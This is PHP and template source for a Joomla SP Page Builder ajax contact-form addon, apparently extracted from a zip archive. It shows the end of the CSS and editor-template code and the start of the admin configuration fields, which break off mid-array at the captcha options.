            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input::placeholder,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group textarea::placeholder{';
                $css .= $field_placeholder_color;
                $css .= 'opacity: 1;';
            $css .= '}';
        }
        if($field_hover_placeholder_color){
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:hover::placeholder,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group textarea:hover::placeholder{';
                $css .= $field_hover_placeholder_color;
                $css .= 'opacity: 1;';
            $css .= '}';
        }
        if($field_hover_style){
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:hover,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:active,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:focus,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group textarea:hover,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group textarea:active,';
            $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group textarea:focus{';
                $css .= $field_hover_style;
            $css .= '}';
        }

        //Icon style
		$button_icon_margin = (isset($settings->button_icon_margin) && trim($settings->button_icon_margin)) ? 'margin:'.$settings->button_icon_margin.';' : '';

		if($button_icon_margin) {
			$css .= $addon_id . ' .sppb-btn span {';
			$css .= $button_icon_margin;
			$css .= '}';
        }
        
        //Responsive
        $input_height_sm = (isset($settings->input_height_sm) && $settings->input_height_sm) ? 'height: ' . $settings->input_height_sm . 'px;' : '';
        $field_margin_sm = (isset($settings->field_margin_sm) && $settings->field_margin_sm) ? 'margin: ' . $settings->field_margin_sm . ';' : '';
        $textarea_height_sm = (isset($settings->textarea_height_sm) && $settings->textarea_height_sm) ? 'height: ' . $settings->textarea_height_sm . 'px;' : '';
        if($input_height_sm || $textarea_height_sm || $field_margin_sm){
            $css .= '@media (min-width: 768px) and (max-width: 991px) {';
                if($input_height_sm){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {';
                        $css .= $input_height_sm;
                    $css .= '}';
                }
                if($textarea_height_sm){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group textarea{';
                        $css .= $textarea_height_sm;
                    $css .= '}';
                }
                if($field_margin_sm){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group{';
                        $css .= $field_margin_sm;
                    $css .= '}';
                }
            $css .= '}';
        }
        $input_height_xs = (isset($settings->input_height_xs) && $settings->input_height_xs) ? 'height: ' . $settings->input_height_xs . 'px;' : '';
        $field_margin_xs = (isset($settings->field_margin_xs) && $settings->field_margin_xs) ? 'margin: ' . $settings->field_margin_xs . ';' : '';
        $textarea_height_xs = (isset($settings->textarea_height_xs) && $settings->textarea_height_xs) ? 'height: ' . $settings->textarea_height_xs . 'px;' : '';
        if($input_height_xs || $textarea_height_xs || $field_margin_xs){
            $css .= '@media (max-width: 767px) {';
                if($input_height_xs){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {';
                        $css .= $input_height_xs;
                    $css .= '}';
                }
                if($textarea_height_xs){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group textarea{';
                        $css .= $textarea_height_xs;
                    $css .= '}';
                }
                if($field_margin_xs){
                    $css .= '#sppb-addon-' . $this->addon->id . ' .sppb-ajaxt-contact-form div.sppb-form-group {';
                        $css .= $field_margin_xs;
                    $css .= '}';
                }
            $css .= '}';
        }
        
        return $css;
    }

    public static function getTemplate() {
        $output = '
		<#
		var classList = "";
		classList += " sppb-btn-"+data.button_type;
		classList += " sppb-btn-"+data.button_size;
		classList += " sppb-btn-"+data.button_shape;
		if(!_.isEmpty(data.button_appearance)){
			classList += " sppb-btn-"+data.button_appearance;
		}

		classList += " "+data.button_block;

		var modern_font_style = false;
		var button_fontstyle = data.button_fontstyle || "";
		var button_font_style = data.button_font_style || "";

        var button_padding = "";
        var button_padding_sm = "";
        var button_padding_xs = "";

        if(data.button_padding){
            if(_.isObject(data.button_padding)){
                if(data.button_padding.md.trim() !== ""){
                    button_padding = data.button_padding.md.split(" ").map(item => {
                        if(_.isEmpty(item)){
                            return "0";
                        }
                        return item;
                    }).join(" ")
                }

                if(data.button_padding.sm.trim() !== ""){
                    button_padding_sm = data.button_padding.sm.split(" ").map(item => {
                        if(_.isEmpty(item)){
                            return "0";
                        }
                        return item;
                    }).join(" ")
                }

                if(data.button_padding.xs.trim() !== ""){
                    button_padding_xs = data.button_padding.xs.split(" ").map(item => {
                        if(_.isEmpty(item)){
                            return "0";
                        }
                        return item;
                    }).join(" ")
                }
            } else {
                if(data.button_padding.trim() !== ""){
                    button_padding = data.button_padding.split(" ").map(item => {
                        if(_.isEmpty(item)){
                                return "0";
                        }
                        return item;
                    }).join(" ")
                }
            }
        }
		#>
		<style type="text/css">

			#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.button_type }}{
				letter-spacing: {{ data.button_letterspace }};
				<# if(_.isObject(button_font_style) && button_font_style.underline) { #>
					text-decoration: underline;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.italic) { #>
					font-style: italic;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.uppercase) { #>
					text-transform: uppercase;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.weight) { #>
					font-weight: {{ button_font_style.weight }};
					<# modern_font_style = true #>
				<# } #>

				<# if(!modern_font_style) { #>
					<# if(_.isArray(button_fontstyle)) { #>
						<# if(button_fontstyle.indexOf("underline") !== -1){ #>
							text-decoration: underline;
						<# } #>
						<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
							text-transform: uppercase;
						<# } #>
						<# if(button_fontstyle.indexOf("italic") !== -1){ #>
							font-style: italic;
						<# } #>
						<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
							font-weight: lighter;
						<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
							font-weight: normal;
						<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
							font-weight: bold;
						<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
							font-weight: bolder;
						<# } #>
					<# } #>
				<# } #>
			}

			<# if(data.button_type == "custom"){ #>
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
                    color: {{ data.button_color }};
                    <# if(_.isObject(data.fontsize)){ #>
                        font-size: {{data.fontsize.md}}px;
                    <# } else { #>
                        font-size: {{data.fontsize}}px;
                    <# } #>
                    padding: {{ button_padding }};
                    <# if(data.button_appearance == "outline"){ #>
                        border-color: {{ data.button_background_color }}
                    <# } else if(data.button_appearance == "3d"){ #>
                        border-bottom-color: {{ data.button_background_color_hover }};
                        background-color: {{ data.button_background_color }};
                    <# } else if(data.button_appearance == "gradient"){ #>
                        border: none;
                        <# if(typeof data.button_background_gradient.type !== "undefined" && data.button_background_gradient.type == "radial"){ #>
                            background-image: radial-gradient(at {{ data.button_background_gradient.radialPos || "center center"}}, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
                        <# } else { #>
                            background-image: linear-gradient({{ data.button_background_gradient.deg || 0}}deg, {{ data.button_background_gradient.color }} {{ data.button_background_gradient.pos || 0 }}%, {{ data.button_background_gradient.color2 }} {{ data.button_background_gradient.pos2 || 100 }}%);
                        <# } #>
                    <# } else { #>
                        background-color: {{ data.button_background_color }};
                <# } #>
            }

				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom:hover{
                    color: {{ data.button_color_hover }};
                    background-color: {{ data.button_background_color_hover }};
                    <# if(data.button_appearance == "outline"){ #>
                            border-color: {{ data.button_background_color_hover }};
                    <# } else if(data.button_appearance == "gradient"){ #>
                            <# if(typeof data.button_background_gradient_hover.type !== "undefined" && data.button_background_gradient_hover.type == "radial"){ #>
                                    background-image: radial-gradient(at {{ data.button_background_gradient_hover.radialPos || "center center"}}, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
                            <# } else { #>
                                    background-image: linear-gradient({{ data.button_background_gradient_hover.deg || 0}}deg, {{ data.button_background_gradient_hover.color }} {{ data.button_background_gradient_hover.pos || 0 }}%, {{ data.button_background_gradient_hover.color2 }} {{ data.button_background_gradient_hover.pos2 || 100 }}%);
                            <# } #>
                    <# } #>
				}
                @media (min-width: 768px) and (max-width: 991px) {
                    #sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
                        <# if(_.isObject(data.fontsize)){ #>
                            font-size: {{data.fontsize.sm}}px;
                        <# } #>
                        padding: {{ button_padding_sm }};
                    }
				}
				@media (max-width: 767px) {
                    #sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
                        <# if(_.isObject(data.fontsize)){ #>
                            font-size: {{data.fontsize.xs}}px;
                        <# } #>
                        padding: {{ button_padding_xs }};
                    }
				}

            <# } #>

            <# if(data.field_bg_color || data.field_color || data.field_font_size || data.field_border_color || data.field_border_width || data.field_border_radius || data.field_padding || data.input_height){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {
                    background:{{data.field_bg_color}};
                    color:{{data.field_color}};
                    font-size:{{data.field_font_size}}px;
                    border-color:{{data.field_border_color}};
                    border-width:{{data.field_border_width}};
                    border-radius:{{data.field_border_radius}}px;
                    padding:{{data.field_padding}};
                    <# if(_.isObject(data.input_height)){ #>
                        height:{{data.input_height.md}}px;
                    <# } #>
                    transition:.35s;
                }
            <# }
            if(data.field_bg_color || data.field_color || data.field_font_size || data.field_border_color || data.field_border_width || data.field_border_radius || data.field_padding || data.textarea_height){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group textarea{
                    background:{{data.field_bg_color}};
                    color:{{data.field_color}};
                    font-size:{{data.field_font_size}}px;
                    border-color:{{data.field_border_color}};
                    border-width:{{data.field_border_width}};
                    border-radius:{{data.field_border_radius}}px;
                    padding:{{data.field_padding}};
                    <# if(_.isObject(data.textarea_height)){ #>
                        height:{{data.textarea_height.md}}px;
                    <# } #>
                    transition:.35s;
                }
            <# }
            if(_.isObject(data.field_margin)){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group {
                    <# if(_.isObject(data.field_margin)){ #>
                        margin:{{data.field_margin.md}};
                    <# } #>
                }
            <# }
            if(data.field_placeholder_color){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input::placeholder,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group textarea::placeholder{
                    color:{{data.field_placeholder_color}};
                    opacity: 1;
                }
            <# }
            if(data.field_hover_placeholder_color){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:hover::placeholder,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group textarea:hover::placeholder{
                    color:{{data.field_hover_placeholder_color}};
                    opacity: 1;
                }
            <# }
            if(data.field_hover_bg_color || data.field_hover_color || data.field_focus_border_color){
            #>
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:hover,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:active,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:focus,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group textarea:hover,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group textarea:active,
                #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group textarea:focus{
                    background: {{data.field_hover_bg_color }};
                    color:{{data.field_hover_color}};
                    border-color:{{data.field_focus_border_color}};
                }
            <# }
            if(_.isObject(data.input_height) || _.isObject(data.textarea_height) || _.isObject(data.field_margin)){
            #>
                @media (min-width: 768px) and (max-width: 991px) {
                    <# if(_.isObject(data.input_height)){ #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {
                            height:{{data.input_height.sm}}px;
                        }
                    <# }
                    if(_.isObject(data.textarea_height)){
                    #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group textarea{
                            height: {{data.textarea_height.sm}}px;
                        }
                    <# }
                    if(_.isObject(data.field_margin)){
                    #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group {
                            margin: {{data.field_margin.sm}};
                        }
                    <# } #>
                }
            <# }
            if(_.isObject(data.input_height) || _.isObject(data.textarea_height) || _.isObject(data.field_margin)){
            #>
                @media (max-width: 767px) {
                    <# if(_.isObject(data.input_height)){ #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form .sppb-form-group input:not(.sppb-form-check-input) {
                            height:{{data.input_height.xs}}px;
                        }
                    <# }
                    if(_.isObject(data.textarea_height)){
                    #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group textarea{
                            height:{{data.textarea_height.xs}}px;
                        }
                    <# }
                    if(_.isObject(data.field_margin)){
                    #>
                        #sppb-addon-{{ data.id }} .sppb-ajaxt-contact-form div.sppb-form-group {
                            margin:{{data.field_margin.xs}};
                        }
                    <# } #>
                }
            <# } #>

            <# if(data.button_type == "link"){ #>
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-link{
					color: {{data.link_button_color}};
					border-color: {{data.link_border_color}};
					border-width: 0 0 {{data.link_button_border_width}}px 0;
					padding: 0 0 {{data.link_button_padding_bottom}}px 0;
					text-decoration: none;
					border-radius: 0;
				}
				<# if(data.link_button_status == "hover") { #>
					#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-link:hover,
					#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-link:focus{
						color: {{data.link_button_hover_color}};
						border-color: {{data.link_button_border_hover_color}};
					}
				<# } #>
            <# } #>
            #sppb-addon-{{ data.id }} .sppb-btn span{
				<# if(_.isObject(data.button_icon_margin)){ #>
					margin: {{data.button_icon_margin.md}};
				<# } else { #>
					margin: {{data.button_icon_margin}};
				<# } #>
			}

		</style>
		<div class="sppb-addon sppb-addon-ajax-contact {{ data.class }}">
			<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="title" contenteditable="true">{{ data.title }}</{{ data.heading_selector }}><# } #>
			<div class="sppb-ajax-contact-content">
				<form class="sppb-ajaxt-contact-form">
					<div class="sppb-row">
						<div class="sppb-form-group sppb-col-sm-{{ data.name_input_col || 12 }}">
							<# if(data.show_label){ #>
								<label for="name">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME') . '</label>
							<# } #>
							<input type="text" name="name" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME') . '" required="required">
						</div>

						<div class="sppb-form-group sppb-col-sm-{{ data.email_input_col || 12 }}">
							<# if(data.show_label){ #>
								<label for="email">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL') . '</label>
							<# } #>
							<input type="email" name="email" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL') . '" required="required">
                        </div>
                        
                        <# if(data.show_phone) { #>
                            <div class="sppb-form-group sppb-col-sm-{{ data.phone_input_col || 12 }}">
                                <# if(data.show_label){ #>
                                    <label for="subject">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE') . '</label>
                                <# } #>
                                <input type="text" name="phone" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE') . '" required="required">
                            </div>
                        <# } #>

						<div class="sppb-form-group sppb-col-sm-{{ data.subject_input_col || 12 }}">
							<# if(data.show_label){ #>
								<label for="subject">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT') . '</label>
							<# } #>
							<input type="text" name="subject" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT') . '" required="required">
                        </div>

						<# if(data.formcaptcha && data.captcha_type == "default") { #>
							<div class="sppb-form-group sppb-col-sm-{{ data.captcha_input_col || 12 }}">
								<# if(data.show_label){ #>
									<label for="captcha_question">{{ data.captcha_question }}</label>
								<# } #>
								<input type="text" name="captcha_question" class="sppb-form-control" placeholder="{{ data.captcha_question }}" required="required">
							</div>
						<# } #>
						<div class="sppb-form-group sppb-col-sm-{{ data.message_input_col || 12 }}">
							<# if(data.show_label){ #>
								<label for="message">' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE') . '</label>
							<# } #>
							<textarea name="message" rows="5" class="sppb-form-control" placeholder="' . JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE') . '" required="required"></textarea>
						</div>
					</div>
                    <# if(data.formcaptcha && data.captcha_type == "gcaptcha"){ #>
                        <div class="sppb-row">
                            <div class="sppb-form-group sppb-col-sm-12">
                                <img src="components/com_sppagebuilder/assets/images/captcha.png" >
                            </div>
                        </div>
					<# } #>
                    <# if(data.formcaptcha && data.captcha_type == "igcaptcha"){ #>
                        <div class="sppb-row">
                            <div class="sppb-form-group sppb-col-sm-12">
                                <img src="components/com_sppagebuilder/assets/images/captcha-2.png" >
                            </div>
                        </div>
					<# } #>
                    <# if(data.show_checkbox){ #>
                        <div class="sppb-row">
                            <div class="sppb-form-group sppb-col-sm-12">
                                <div class="sppb-form-check">
                                    <input class="sppb-form-check-input" type="checkbox" id="agreement" required="required">
                                    <label class="sppb-form-check-label" for="agreement">{{{ data.checkbox_title }}}</label>
                                </div>
                            </div>
                        </div>
					<# } 
                        let iconLeft = "";
                        let iconRight = "";
                        if(data.button_icon_position == "left" && !_.isEmpty(data.button_icon)){
                            iconLeft = \'<span class="fa \' + data.button_icon + \'"></span>\';
                        } else {
                            iconRight = \'<span class="fa \' + data.button_icon + \'"></span>\';
                        }
                    #>
                    <div class="sppb-row">
                        <div class="sppb-col-sm-12 {{data.button_position}}">
                            <button type="submit" id="btn-{{ data.id }}" class="sppb-btn {{classList}}">{{{iconLeft}}} {{ data.button_text }} {{{iconRight}}}</button>
                        </div>
                    </div>
				</form>
			</div>
		</div>';

        return $output;
    }

}PK!� I���0flex/sppagebuilder/addons/ajax_contact/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die('Restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
        array(
            'type' => 'content',
            'addon_name' => 'sp_ajax_contact',
            'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT'),
            'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_DESC'),
            'category' => 'Content',
            'attr' => array(
                'general' => array(
                    'admin_label' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
                        'std' => ''
                    ),
                    'title' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
                        'std' => ''
                    ),
                    'heading_selector' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
                        'values' => array(
                            'h1' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
                            'h2' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
                            'h3' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
                            'h4' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
                            'h5' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
                            'h6' => JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
                        ),
                        'std' => 'h3',
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_font_family' => array(
                        'type' => 'fonts',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
                        'depends' => array(array('title', '!=', '')),
                        'selector' => array(
                            'type' => 'font',
                            'font' => '{{ VALUE }}',
                            'css' => '.sppb-addon-title { font-family: {{ VALUE }}; }'
                        )
                    ),
                    'title_fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
                        'std' => '',
                        'depends' => array(array('title', '!=', '')),
                        'responsive' => true,
                        'max' => 400,
                    ),
                    'title_lineheight' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
                        'std' => '',
                        'depends' => array(array('title', '!=', '')),
                        'responsive' => true,
                        'max' => 400,
                    ),
                    'title_font_style' => array(
                        'type' => 'fontstyle',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_letterspace' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
                        'values' => array(
                            '0' => 'Default',
                            '1px' => '1px',
                            '2px' => '2px',
                            '3px' => '3px',
                            '4px' => '4px',
                            '5px' => '5px',
                            '6px' => '6px',
                            '7px' => '7px',
                            '8px' => '8px',
                            '9px' => '9px',
                            '10px' => '10px'
                        ),
                        'std' => '0',
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_text_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
                        'depends' => array(array('title', '!=', '')),
                    ),
                    'title_margin_top' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
                        'placeholder' => '10',
                        'depends' => array(array('title', '!=', '')),
                        'responsive' => true,
                        'max' => 400,
                    ),
                    'title_margin_bottom' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
                        'placeholder' => '10',
                        'depends' => array(array('title', '!=', '')),
                        'responsive' => true,
                        'max' => 400,
                    ),
                    'separator_options' => array(
                        'type' => 'separator',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_ADDON_OPTIONS')
                    ),
					'styles'=>array(
						'type'=>'select',
						'title'=>JText::_('FLEX_ADDON_AJAX_CONTACT_STYLE'),
						'desc'=>JText::_('FLEX_ADDON_AJAX_CONTACT_STYLE_DESC'),
						'values'=>array(
							'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
							//'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
							'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
							),
						'std'=>'default',
					),
                    'recipient_email' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_RECIPIENT_EMAIL'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_RECIPIENT_EMAIL_DESC'),
                        'std' => 'email@yourdomain.com'
                    ),
                    'from_name' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FORM_NAME'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FORM_NAME_DESC'),
                        'std' => ''
                    ),
                    'from_email' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FORM_EMAIL'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FORM_EMAIL_DESC'),
                        'std' => ''
                    ),
                    'show_phone' => array(
                        'type' => 'checkbox',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_PHONE_FIELD'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_PHONE_FIELD_DESC'),
                        'values' => array(
                            '0' => 'No',
                            '1' => 'Yes'
                        ),
                        'std' => '0'
                    ),
                    //Input style
                    'field_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FIELD_OPTION'),
                    ),
                    'field_bg_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_BGCOLOR'),
                        'std' => ''
                    ),
                    'field_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_COLOR'),
                        'std' => ''
                    ),
                    'field_placeholder_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_PLACEHOLDER_COLOR'),
                        'std' => ''
                    ),
                    'input_height' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_HEIGHT'),
                        'max'=>200,
                        'std' => '',
                        'responsive'=>true,
                        'std' => array('md'=>'', 'sm'=>'', 'xs'=>''),
                    ),
                    'field_font_size' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_FONTSIZE'),
                        'max'=>200,
                        'std' => '',
                    ),
                    'field_border_width' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_BORDER_WIDTH'),
                        'std' => '',
                    ),
                    'field_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_BORDER_COLOR'),
                        'std' => '',
                    ),
                    'field_border_radius' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_BORDER_RADIUS'),
                        'max'=>200,
                        'std' => '',
                    ),
                    'field_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_MARGIN'),
                        'responsive'=> true,
                        'std' => array('md'=>'0px 0px 20px 0px', 'sm'=>'0px 0px 15px 0px', 'xs'=>'0px 0px 15px 0px'),
                    ),
                    'field_padding' => array(
                        'type' => 'padding',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_PADDING'),
                        'std' => '',
                    ),
                    'textarea_height' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_TEXTAREA_HEIGHT'),
                        'max'=>1000,
                        'responsive'=>true,
                        'std' => array('md'=>'', 'sm'=>'', 'xs'=>''),
                    ),
                    'field_hover_bg_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_HOVER_BG_COLOR'),
                        'std' => '',
                    ),
                    'field_hover_placeholder_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_HOVER_COLOR'),
                        'std' => '',
                    ),
                    'field_focus_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INPUT_FOCUS_BORDER_COLOR'),
                        'std' => '',
                    ),
                    //Captcha
                    'captcha_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_OPTION'),
                    ),
                    'formcaptcha' => array(
                        'type' => 'checkbox',
